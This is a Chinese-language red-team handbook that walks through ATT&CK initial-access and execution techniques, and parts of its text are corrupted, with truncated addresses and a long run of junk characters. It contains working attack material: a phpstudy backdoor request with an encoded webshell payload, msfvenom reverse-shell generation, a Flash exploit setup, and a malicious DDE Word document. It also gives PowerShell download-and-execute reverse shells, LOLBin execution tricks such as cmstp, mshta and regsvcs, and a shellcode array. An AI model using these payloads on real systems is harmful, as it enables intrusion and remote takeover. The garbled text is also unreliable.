ATT-CK實(shí)戰(zhàn)指南手冊(cè)（修改版）

ATT&CK實(shí)戰(zhàn)指南手冊(cè)目錄：一、InitialAccess（入口點(diǎn)）二、Execution（命令執(zhí)行）三、Persistence（持久化）四、PrivilegeEscalation（權(quán)限提升）五、DefenseEvasion（繞過防御）六、CredentialAccess（獲取憑證）七、Discovery（基礎(chǔ)信息收集）八、lateral-movement（橫向滲透）九、C&C（命令控制）十、Exfiltration（信息竊?。┮?、InitialAccess（入口點(diǎn)）一、水坑攻擊分析并了解目標(biāo)的上網(wǎng)活動(dòng)規(guī)律，尋找目標(biāo)經(jīng)常訪問的網(wǎng)站的漏洞，利用漏洞在該網(wǎng)站植入惡意代碼（陷阱、水坑），在目標(biāo)進(jìn)行訪問時(shí)，攻擊形成。多種可能被植入的代碼，包括：JavaScript、iframe等植入惡意的廣告鏈接內(nèi)置的Web于顯示W(wǎng)eb（例如，論壇帖子，評(píng)論和其他用戶可控制的Web）重定向用戶所經(jīng)常訪問的站點(diǎn)到惡意站點(diǎn)1、在頁面嵌入存儲(chǔ)型XSS，獲得用戶cookie信息編寫具有惡意功能的javascript語句，例如獲取登錄用戶cookie、內(nèi)網(wǎng)ip、截屏、網(wǎng)頁源代碼等操作，配合XSS平臺(tái)可查看獲取到的信息2、phpstudybackdoor2019年9月20日杭州公安微信公眾賬號(hào)發(fā)布了“杭州警方通報(bào)打擊涉網(wǎng)違法2019”專項(xiàng)行動(dòng)戰(zhàn)果”的文章，文章里說明phpstudy，攻擊者通過在huy2016h5.4和huy2018h5.2.17phpstudy后門代碼存在于\x\h8-xlr.llh\h5.4.45\x\hlxlr.llPHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll用notepadval，文件存在val%(‘%’證明漏洞存在，如圖：netuserGET/index.phpHTTP/1.1Host:82User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64;rv:66.0)Gecko/20100101Firefox/66.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding:gzip,deflateConnection:close7Upgrade-Insecure-Requests:1Cache-Control:max-age=0一句話木馬GET/index.phpHTTP/1.1Host:08User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64;rv:66.0)Gecko/20100101Firefox/66.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding:gzip,deflateConnection:closeAccept-charset:c3lzdGVtKCdlY2hvIF48P3BocCBAZXZhbCgkX1BPU1RbInNoZWxsIl0pP14+PlBIUFR1dG9yaWFsXFdXV1xzaGVsbC5waHAnKTs=Upgrade-Insecure-Requests:13、JSONP水坑攻擊4、Adobeflashplayer28（CVE-2018-4878）攻擊者通過構(gòu)造特殊的Flash鏈接，當(dāng)用戶用瀏覽器/郵件/Office訪問此Flash鏈接時(shí)，會(huì)被“遠(yuǎn)程代碼執(zhí)行”，并且直接被getshell。環(huán)境：KaliLinux+Windows7sp1滲透機(jī)：KaliLinux（ip：28）Windows7sp1（ip：29）exp：v2018488.yflah：flahlay3.xea）使用msfvenom生成shell代碼msfvenom-pwindows/meterpreter/reverse_tcplhost=28lport=8888-fpython>shellcode.txt進(jìn)入CVE2018488ar目錄，編輯CVE2018488.y修改swf文件及html文件位置：Pyhn執(zhí)行CVE2018488ar.y文件，一個(gè)htmlnyKaliLinux開啟Apache22/var/www/html目錄中（apacheweb）serviceapache2startcpindex2.html/var/www/html/index2.htmlcpexploit.swf/var/www/html/exploit.swfKali開啟shellwin7上安裝AdobeFlashPlayer28使用win7自帶的IE828/index2.htmlKaliLinux上成功獲取meterpretershell5、Beef攻擊框架二、利用公開漏洞利用軟件、數(shù)據(jù)庫、中間件、第三方庫或存在漏洞的庫等公開的漏洞，對(duì)目標(biāo)系統(tǒng)進(jìn)行攻擊，以達(dá)到攻擊未及時(shí)修補(bǔ)或升級(jí)的信息系統(tǒng)。公開漏洞來源：CVE、CNVD、CNNVD、exploit-dbqqgithub三、外部遠(yuǎn)程服務(wù)VPN，Citrix等遠(yuǎn)程服務(wù)和其他訪問機(jī)制允許用戶從外部位置連接到內(nèi)部企業(yè)網(wǎng)絡(luò)資源。通常有遠(yuǎn)程服務(wù)網(wǎng)關(guān)來管理這些服務(wù)的連接和憑證身份驗(yàn)證。Windows遠(yuǎn)程管理等服務(wù)也可以在外部使用。通常需要訪問有效帳戶來使用該服務(wù)，這可以通過憑證嫁接或在危及企業(yè)網(wǎng)絡(luò)后從用戶處獲得憑證來實(shí)現(xiàn)。在操作期間，可以將對(duì)遠(yuǎn)程服務(wù)的訪問用作冗余訪問的一部分。遠(yuǎn)程服務(wù)：VPN、Citrix、SSH、Windows遠(yuǎn)程桌面、TeamViewer、EasyConnect等四、滲透到其他網(wǎng)絡(luò)介質(zhì)如果命令和控制網(wǎng)絡(luò)是有線因特網(wǎng)連接，則可以例如通過WiFi且可能無法保護(hù)或保護(hù)連接以及主要的Internet五、硬件攻擊計(jì)算機(jī)附件，計(jì)算機(jī)或網(wǎng)絡(luò)硬件可以作為矢量引入系統(tǒng)以獲得執(zhí)行。雖然APT組使用的公開參考很少，但許多滲透測(cè)試人員利用硬件添加進(jìn)行初始訪問。商業(yè)和開源產(chǎn)品的功能包括被動(dòng)網(wǎng)絡(luò)竊聽，打破中間人加密，擊鍵注入，通過DMA讀取內(nèi)核內(nèi)存，增加新的無線接入現(xiàn)有網(wǎng)絡(luò)等?？商砑拥挠布篣盤、鼠標(biāo)、鍵盤、硬盤、智能設(shè)備、攝像頭、打印機(jī)、USB數(shù)據(jù)線、Pineapple等1、通過一根數(shù)據(jù)線控制你的蘋果電腦一根經(jīng)過特殊定制的蘋果手機(jī)充電器，使用它連接蘋果電腦后，可以通過植入木馬，遠(yuǎn)程操控電腦。參考鏈接：DemonSeed惡意USB/O-MG/DemonSeed六、通過可移動(dòng)媒體進(jìn)行復(fù)制通過將惡意軟件復(fù)制到可移動(dòng)媒體并在將媒體插入系統(tǒng)并執(zhí)行時(shí)利用自動(dòng)運(yùn)行功能，攻擊者可能會(huì)移動(dòng)到系統(tǒng)上，可能是那些在斷開連接或氣隙網(wǎng)絡(luò)上的系統(tǒng)。在橫向移動(dòng)的情況下，這可能通過修改存儲(chǔ)在可移動(dòng)媒體上的可執(zhí)行文件或通過復(fù)制惡意軟件并將其重命名為合法文件來欺騙用戶在單獨(dú)的系統(tǒng)上執(zhí)行它來實(shí)現(xiàn)。在初始訪問的情況下，這可以通過手動(dòng)操縱媒體，修改用于初始格式化媒體的系統(tǒng)或修改媒體固件本身來實(shí)現(xiàn)?？梢苿?dòng)媒體：BadUSB、光碟等七、魚叉式釣魚附件魚叉式釣魚附件是魚叉式釣魚的一種特殊變體。魚叉式釣魚附件不同于其他形式的魚叉式釣魚，因?yàn)樗l(fā)送帶有有惡意軟件的附件。所有形式的魚叉式網(wǎng)絡(luò)釣魚都是以電子郵件的方式提供針對(duì)特定個(gè)人，公司或行業(yè)的社會(huì)工程。在這種情況下，攻擊者會(huì)將文件附加到魚叉式網(wǎng)絡(luò)釣魚電子郵件中，并且通常依靠用戶執(zhí)行來獲取執(zhí)行權(quán)。附件有許多選項(xiàng)，例如MicrosoftOfficePDF電子郵件還可能包含有關(guān)如何解密附件的說明，例如zip一個(gè)應(yīng)用程序的文件。帶鏈接的魚叉式網(wǎng)頁釣魚是魚叉式網(wǎng)頁釣魚的一種特殊變種。它與其他形式的魚叉式網(wǎng)絡(luò)釣魚不同之處在于它使用鏈接來下載電子郵件中包含的惡意軟件，而不是將惡意文件附加到電子郵件本身，以避免可能檢查電子郵件附件的防御。所有形式的魚叉式網(wǎng)絡(luò)釣魚都是以電子方式提供的針對(duì)特定個(gè)人，公司或行業(yè)的社會(huì)工程。在這種情況下，惡意電子郵件包含鏈接。通常，鏈接將伴隨社會(huì)工程文本，并要求用戶主動(dòng)點(diǎn)擊或復(fù)制并將URL粘貼到瀏覽器中，從而利用用戶執(zhí)行。被訪問的網(wǎng)站可能使用漏洞攻擊來破壞Web電子郵件的接收（即網(wǎng)絡(luò)錯(cuò)誤/網(wǎng)絡(luò)信標(biāo)）。九、通過服務(wù)進(jìn)行魚叉式網(wǎng)絡(luò)釣魚通過服務(wù)進(jìn)行的魚叉式網(wǎng)絡(luò)釣魚是魚叉式釣魚的一種特殊變種。它與其他形式的魚叉式網(wǎng)絡(luò)釣魚不同之處在于它使用第三方服務(wù)而不是直接通過企業(yè)電子郵件渠道。所有形式的魚叉式網(wǎng)絡(luò)釣魚都是以電子方式提供的針對(duì)特定個(gè)人，公司或行業(yè)的社會(huì)工程。在這種情況下，攻擊者通過各種社交媒體服務(wù)，個(gè)人網(wǎng)絡(luò)郵件和其他非企業(yè)控制的服務(wù)發(fā)送消息。與企業(yè)相比，這些服務(wù)更可能具有不太嚴(yán)格的安全策略。與大多數(shù)類型的魚叉式網(wǎng)絡(luò)釣魚一樣，所發(fā)送的服務(wù)是與目標(biāo)產(chǎn)生融洽關(guān)系，或以某種方式獲得目標(biāo)的興趣。攻擊者會(huì)創(chuàng)建虛假的社交媒體帳戶，并向員工發(fā)送潛在工作機(jī)會(huì)的信息。這樣做可以提供一個(gè)合理的理由來詢問在環(huán)境中運(yùn)行的服務(wù)、策略和軟件。然后，攻擊者可以通過這些服務(wù)發(fā)送惡意鏈接或附件。一個(gè)常見的例子是通過社交媒體與目標(biāo)建立融洽關(guān)系，然后將內(nèi)容發(fā)送到目標(biāo)在其工作計(jì)算機(jī)上使用的個(gè)人網(wǎng)絡(luò)郵件服務(wù)。這允許攻擊者繞過對(duì)工作帳戶的某些電子郵件限制，并且目標(biāo)更有可能打開文件，因?yàn)閮?nèi)容是他們期望的東西。如果有效負(fù)載不能按預(yù)期工作，則攻擊者可以繼續(xù)正常通信，并與目標(biāo)進(jìn)行故障排除，了解如何使其正常工作。十、供應(yīng)鏈妥協(xié)供應(yīng)鏈妥協(xié)是指最終消費(fèi)者在收到數(shù)據(jù)或系統(tǒng)損害之前對(duì)產(chǎn)品或產(chǎn)品交付機(jī)制的操縱。供應(yīng)鏈的妥協(xié)可以在供應(yīng)鏈的任何階段進(jìn)行，包括：操縱開發(fā)工具操縱開發(fā)環(huán)境操作源代碼存儲(chǔ)庫（公共或私有）在開源依賴中操作源代碼操縱軟件更新/分發(fā)機(jī)制受損/受感染的系統(tǒng)映像（工廠感染的多個(gè)可移動(dòng)介質(zhì)案例）用修改版本替換合法軟件向合法分銷商銷售改裝/假冒產(chǎn)品裝運(yùn)攔截雖然供應(yīng)鏈妥協(xié)可能會(huì)影響硬件或軟件的任何組件，但尋求獲得執(zhí)行的攻擊者通常會(huì)專注于在軟件分發(fā)或更新渠道中對(duì)合法軟件的惡意添加。定位可能特定于所需的受害者集，或者惡意軟件可能會(huì)分發(fā)給廣泛的消費(fèi)者，但只會(huì)針對(duì)特定受害者采取其他策略。在許多應(yīng)用程序中用作依賴項(xiàng)的流行開源項(xiàng)目也可能成為向依賴項(xiàng)用戶添加惡意代碼的手段。十一、利用可靠關(guān)系攻擊者可能會(huì)破壞或以其他方式利用能夠接觸到目標(biāo)受害者的組織。通過可信的第三方關(guān)系訪問利用現(xiàn)有的連接，與訪問網(wǎng)絡(luò)的標(biāo)準(zhǔn)機(jī)制相比，該連接可能不受保護(hù)，或者受到的審查較少。組織經(jīng)常授予第二或第三方外部提供者更高的訪問權(quán)限，以便允許他們管理內(nèi)部系統(tǒng)。這些關(guān)系的一些例子包括IT服務(wù)承包商、托管安全供應(yīng)商、基礎(chǔ)設(shè)施承包商(例如HVAC、電梯、物理安全)。第三方提供者的訪問可能僅限于正在維護(hù)的基礎(chǔ)設(shè)施，但可能與企業(yè)的其他部分存在于同一網(wǎng)絡(luò)上。因此，另一方用于訪問內(nèi)部網(wǎng)絡(luò)系統(tǒng)的有效帳戶可能被破壞和使用。十二、利用合法帳號(hào)攻擊者可以使用憑據(jù)訪問技術(shù)竊取特定用戶或服務(wù)帳戶的憑據(jù)，或者通過社會(huì)工程在其偵察過程中更早地捕獲憑據(jù)，以獲得初始訪問權(quán)。攻擊者可能使用的帳戶可以分為三類:默認(rèn)帳戶、本地帳戶和域帳戶。默認(rèn)帳戶是那些內(nèi)置到操作系統(tǒng)中的帳戶，比如Windows理而配置的帳戶。域帳戶是由ActiveDirectory和服務(wù)。以用于對(duì)遠(yuǎn)程系統(tǒng)和外部可用服務(wù)(如VPNs、OutlookWebaccess使用這些證書提供的合法訪問權(quán)限，從而使檢測(cè)它們的存在變得更加困難。碼的還是COTSit遠(yuǎn)程環(huán)境帳戶訪問、憑據(jù)和跨系統(tǒng)網(wǎng)絡(luò)的權(quán)限的重疊是值得關(guān)注的，因?yàn)楣粽呖赡苣軌蚩鐜艉拖到y(tǒng)進(jìn)行切換，以達(dá)到較高的訪問級(jí)別(即，以繞過在企業(yè)內(nèi)設(shè)置的訪問控制。十三、近距離通訊攻擊通過利用近距離通訊來進(jìn)行攻擊。利用目標(biāo)存在的近距離通訊，例如WIFI，WiFi安全標(biāo)標(biāo)準(zhǔn)中常用的加密算法如WEP、WPA/WPA2、WPA-PSK/WPA2-PSK等都存在問題，易被竊聽，且容易泄露用戶系統(tǒng)信息和PSK等重要安全信息，認(rèn)證機(jī)制相對(duì)簡單，易被各種方式主動(dòng)攻擊，得益與這些弱點(diǎn)，WIFI攻擊變得容易。對(duì)近距離通訊進(jìn)行中繼攻擊。攻擊方式：WIFI、藍(lán)牙、ZigBee、NFC、RFID等。十四、[未知漏洞攻擊]通過fuzz所有可能fuzz的目標(biāo)，尋找未知漏洞，利用未知漏洞進(jìn)行攻擊。可攻擊點(diǎn)：web服務(wù)器協(xié)議fuzz硬件fuzz二、Execution環(huán)境：攻擊機(jī)A：Kali（0）用于接收反向shell2012R2（1）1.創(chuàng)建一個(gè)EmpireListener查看設(shè)置信息開始監(jiān)聽當(dāng)監(jiān)聽線程啟動(dòng)運(yùn)行之后，運(yùn)行以下命令，生成將要在目標(biāo)受害機(jī)器上執(zhí)行的PowerShelllauncherpowershellsangfor3.復(fù)制powershellnoPsta-w1-enc之后的轉(zhuǎn)碼腳本并另存為一個(gè)文件然后把它部署于某個(gè)攻擊需要用到的Web服務(wù)器中，用于受害主機(jī)稍后的請(qǐng)求下載。該Web服務(wù)器可以是Apache之類的，但在這里，我用PythonSimpleHTTPServer模塊來快速啟動(dòng)一個(gè)Web服務(wù)，它會(huì)自動(dòng)托管你啟動(dòng)命令目錄內(nèi)的文件，當(dāng)然最好可以創(chuàng)建一個(gè)文件目錄，然后通過終端cd到其中進(jìn)行文件生成（我這里是evil)和啟動(dòng)Web服務(wù)。（Python的Web服務(wù)默認(rèn)監(jiān)聽端口為8000)4.新建一個(gè)Word文檔，通過點(diǎn)擊文檔部件點(diǎn)擊域或者Ctrl+F9添加一個(gè)域，然后修改域代碼為：選擇=(Formula),點(diǎn)擊確定在生成的內(nèi)容上面，右鍵點(diǎn)擊切換域代碼(T)插入powershell代碼{DDEAUTOc:\windows\system32\cmd.exe"/kPowerShell-Nop-sta-NonI-WHiddene"}現(xiàn)在就可以保存該文檔，準(zhǔn)備把它發(fā)送給目標(biāo)受害者了。一旦受害者點(diǎn)擊打開該文檔，會(huì)跳出幾個(gè)錯(cuò)誤，可以配合社工技巧來迷惑用戶來點(diǎn)擊Yes?？梢孕薷倪@些錯(cuò)誤消息更直觀好看一點(diǎn)，例如有一些測(cè)試人員就把它修改為’SymantecDocumentEncryption’。一旦受害者把所有錯(cuò)誤消息都點(diǎn)擊了Yes之后，在我們的監(jiān)聽端就會(huì)反彈回一個(gè)Empire的控制連接，對(duì)受害者系統(tǒng)形成遠(yuǎn)程控制。Empire成功獲取目標(biāo)shell執(zhí)行系統(tǒng)命令環(huán)境：攻擊機(jī)：Kali（0）被攻擊機(jī)：Windows2012R2（2）C:\Users\Administrator>PowerShellIEXNew-ObjectNet.WebClient).DownloadString(/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1');Invoverse-IPAddress0-Port3333Nc-lvp3333流量分析：-SignedScriptProxyExecution()環(huán)境：攻擊機(jī)：Kali（0）被攻擊機(jī)：Windows2012R2（2）安裝Python2.7（或者將py文件打包成exe格式可以免殺）攻擊手法：在遠(yuǎn)程web1.sctpubprn.vbs<?XMLversion="1.0"?><scriptlet><registrationdescription="Bandit"progid="Bandit"version="1.00""remotable="true"></registration><scriptlanguage="JScript"><![CDATA[varr=newActiveXObject("WScript.Shell").Run("calc.exe");]]></script></scriptlet>在目標(biāo)主機(jī)上執(zhí)行cscript/bC:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs127.0.0.1script:0:8000/1.sctWscript方式：啟動(dòng)Empire生成vbs腳本將launcher.vbsEmpire成功獲取目標(biāo)代理chm環(huán)境：攻擊機(jī)：Kali（0）被攻擊機(jī)：Windows2012R2（2）安裝Python2.7（或者將py文件打包成exe格式可以免殺）攻擊手法：創(chuàng)建惡意chm文件如下：SIP.html<html><h1>blueteam</h1><body>Security</body></html>STA.html<html><h1>blueteam</h1><body></body></html>Index.html<!DOCTYPEhtml><html><head><title>Mousejackreplay</title><head></head><body>commandexec<OBJECTid=xclassid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"width=1height=1><PARAMname="Command"value="ShortCut"><PARAMname="Button"value="Bitmap::shortcut"><PARAMname="Item1"value=",powershell.exe,-nop-whidden-cIEX(New-Objectpe-IPAddress0-Port3333"><PARAMname="Item2"value="273,1,1"></OBJECT><SCRIPT>x.Click();</SCRIPT></body></html>誘導(dǎo)用戶點(diǎn)擊執(zhí)行成功獲取反彈shellCMSTP環(huán)境：攻擊機(jī)：Kali（0）被攻擊機(jī)：Windows2012R2（2）安裝Python2.7（或者將py文件打包成exe格式可以免殺）攻擊手法：1.通過MetasploitFramework的msfvenom生成惡意DLL文件（pentestlab.dll）。msfvenom-pwindows/x64/meterpreter/reverse_tcpLHOST=0LPORT=3333-fdll>/root/Desktop/pentestlab.dllINF文件的RegisterOCXSection需要包含惡意DLL的WebDAVcmstp.inf[version]Signature=$chicago$AdvancedINF=2.5[DefaultInstall_SingleUser]RegisterOCXs=RegisterOCXSection[RegisterOCXSection]C:\Users\Administrator\Desktop\pentestlab.dll[Strings]AppAct="SOFTWARE\Microsoft\ConnectionManager"ServiceName="Pentestlab"ShortSvcName="Pentestlab"2、INF文件的RegisterOCXSection需要包含惡意DLL文件的本地路徑或遠(yuǎn)程執(zhí)行的WebDAV位置。3、Metasploitmulti/handler模塊需要配置為接收連接。4、當(dāng)惡意INF文件與cmstp一起提供時(shí)，代碼將會(huì)在后臺(tái)執(zhí)行。cmstp.exe/scmstp.inf5、獲得Meterpreter會(huì)話。-CPL環(huán)境：攻擊機(jī)：Kali（0）被攻擊機(jī)：Windows2012R2（2）安裝Python2.7（或者將py文件打包成exe）dllcpl，以便它可以與控制面板一起執(zhí)行，Metasploit的Msfvenom可以創(chuàng)建一個(gè)自定義的dll，其中可以包含一個(gè)嵌入的meterpreter有效載荷或者DidierStevenscmdDLL禁止cmd運(yùn)行的限制。1、msfvenom生成payloadmsfvenom-pwindows/meterpreter/reverse_tcp-b'\x00\xff'lhost=0lport=3333-fdll-opentestlab.cpl2、msf設(shè)置useexploit/multi/handlersetpayloadwindows/meterpreter/reverse_tcpsetLHOST0setLPORT3333exploit-j3、以下命令將創(chuàng)建一個(gè)注冊(cè)表鍵，這個(gè)注冊(cè)表鍵的值將包含存儲(chǔ)在主機(jī)上的CPL文件的路徑。默認(rèn)情況下，標(biāo)準(zhǔn)用戶對(duì)自己的配置單元是具有寫入權(quán)限的。regaddHKEMACHIE\SOARE\Mirf\in\CurrnVrin\ControlPanel\Cpls"/vpentestlab.cpl/tREG_SZ/d"C:\cpl\pentestlab.cpl"4.打開控制面板執(zhí)行payload或者controlpentestlab.cpl，獲取Meterpreter會(huì)話成功獲取session-ForfilesKali9Win751、forfiles/pc:\windows\system32/mnotepad.exe/ccalc.exe-IEExec環(huán)境：Kali:9Win7:5攻擊手法：C:\Windows\Microsoft.NET\Framework64\v2.0.50727\IEExec.exe9/test64.exe報(bào)錯(cuò)，待解決9.InfDefaultInstallInfDefaultInstall.exe[Version]Signature=$CHICAGO$[DefaultInstall]UnregisterDlls=Squiblydoo[Squiblydoo]11,,scrobj.dll,2,60,/subTee/24c7d8e1ff0f5602092f58cbb3f7d302/raw/ef22366bfb62a2ddea8c5e321d3ce2f4c95d2a66/Backdoor-Minimalist.sctInstaIIUtil實(shí)驗(yàn)環(huán)境：攻擊機(jī)：Kali（0）被攻擊機(jī)：Windows7（1）工具地址：/khr0x40sh/WhiteListEvasion.git例子:生成scyhnInallUil.yfile.xeayladwindows/meterpreter/reverse_httpslhost46lport443示：生成二進(jìn)制文件.\csc.exepentestlab.cs\InstallUtil.exe/logfile/logtoconsole=false/upentestlab.exemsf設(shè)置成功獲取session獲取shellMSHTA環(huán)境：Kali:9Win7:5攻擊手法：1、在kali上啟動(dòng)Empire框架后輸入：listenersuselistenerhttpsetHost9setPort8080execute輸出(Empire:listeners)>uselistenerhttp(Empire:listeners/http)>setHost9(Empire:listeners/http)>setPort8080(Empire:listeners/http)>setNamemshta(Empire:listeners/http)>execute[*]Startinglistener'mshta'ServingFlaskapp"http"(lazyloading)Environment:productionWARNING:Donotusethedevelopmentserverinaproductionenvironment.UseaproductionWSGIserverinstead.Debugmode:off[+]Listenersuccessfullystarted!(Empire:listeners/http)>listeners[*]Activelisteners:Name Module Host Delay/Jitter KillDatemshta http 9:8080 (Empire:listeners)>2、Empire生成hta文件usestagerwindows/htasetListenerhttpsetOutFile/root/Desktop/1.htaexecutePython開啟web服務(wù)，受害機(jī)執(zhí)行cd/root/Desktop/python3-mhttp.server80ServingHTTPonport80(:80/)...Win7執(zhí)行：mshta.exe9:80/1.hta[payload監(jiān)聽的端口和下載的端口不能同一個(gè)]Empire成功收到受害機(jī)shellMSIexec環(huán)境：Kali:9Win7:5攻擊手法：1、通過msfvenom生成payloadmsfvenom-ax86-fmsi-pwindows/execCMD=calc.exe-ocalc.png2、搭建簡單web服務(wù)器python-mSimpleHTTPServer803、在本地計(jì)算機(jī)上下載文件后，使用msiexec運(yùn)行payloadmsiexec/q/i9/calc.pngWin7復(fù)現(xiàn)不成功Win2008復(fù)現(xiàn)成功Win2016復(fù)現(xiàn)成功Pcalua環(huán)境：Kali:9Win7:5攻擊手法：C:\windows\system32\pcalua.exe-aC:\file.lnkC:\windows\system32\pcalua.exe-anotepad.exeC:\windows\system32\pcalua.exe-a\\server\payload.dll（本地執(zhí)行遠(yuǎn)程主機(jī)payload）^^a^a^a^a^a^aa^a^a^a^aa^a^a^a^aa^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^nnotepad.exeRegsvcs/Regasm（.NET/）環(huán)境：Kali:9Win7:5攻擊手法：1.使用powershell轉(zhuǎn)換出key.snkPSD:\>$key='BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2P7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='PSD:\>$Content=[System.Convert]::FromBase64String($key)PSD:\>Set-Contentkey.snk-Value$Content-EncodingByte2、MsfVenom生成C#版的ShellCode，復(fù)制ShellCode到一個(gè)文件中命名為regsvcs.csmsfvenom-ax86-platformWindows-pwindows/meterpreter/reverse_tcpLHOST=9 LPORT=4444-fcsharpusingSystem;usingSystem.EnterpriseServices;System.Runtime.InteropServices;/*Author:CaseySmith,Twitter:@subTeeLicense:BSD3-ClauseCreateYourStrongNameKey->key.snk$key='BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='$Content=[System.Convert]::FromBase64String($key)Set-Contentkey.snk-Value$Content-EncodingByteC:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe/r:System.EnterpriseServices.dll/target:library/out:regsvcs.dll/keyfile:key.snkregsvcs.csC:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exeregsvcs.dll[OR]C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exeregsvcs.dll//ExecutesUnRegisterClassIfyoudon'thavepermissionsC:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe/Uregsvcs.dllC:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe/Uregsvcs.dll//ThiscallstheUnregisterClassMethod*/namespaceregsvcser{publicclassBypass:ServicedComponent{publicBypass(){Console.WriteLine("IamabasicCOMObject");}[ComRegisterFunction]//ThisexecutesifregistrationissuccessfulpublicstaticvoidRegisterClass(stringkey){Console.WriteLine("Ishouldn'treallyexecute");Shellcode.Exec();}[ComUnregisterFunction]//ThisexecutesifregistrationfailspublicstaticvoidUnRegisterClass(stringkey){Console.WriteLine("Ishouldn'treallyexecuteeither.");Shellcode.Exec();}}publicclassShellcode{publicstaticvoidExec(){//nativefunction'scompiledcode//generatedwithmetasploit//executescalc.exebyte[]shellcode=newbyte[341]{0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0x89,0xe8,0xff,0xd0,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x0a,0x68,0x0a,0x64,0x13,0x13,0x68,0x02,0x00,0x11,0x5c,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0xff,0x4e,0x08,0x75,0xec,0xe8,0x67,0x00,0x00,0x00,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7e,0x36,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd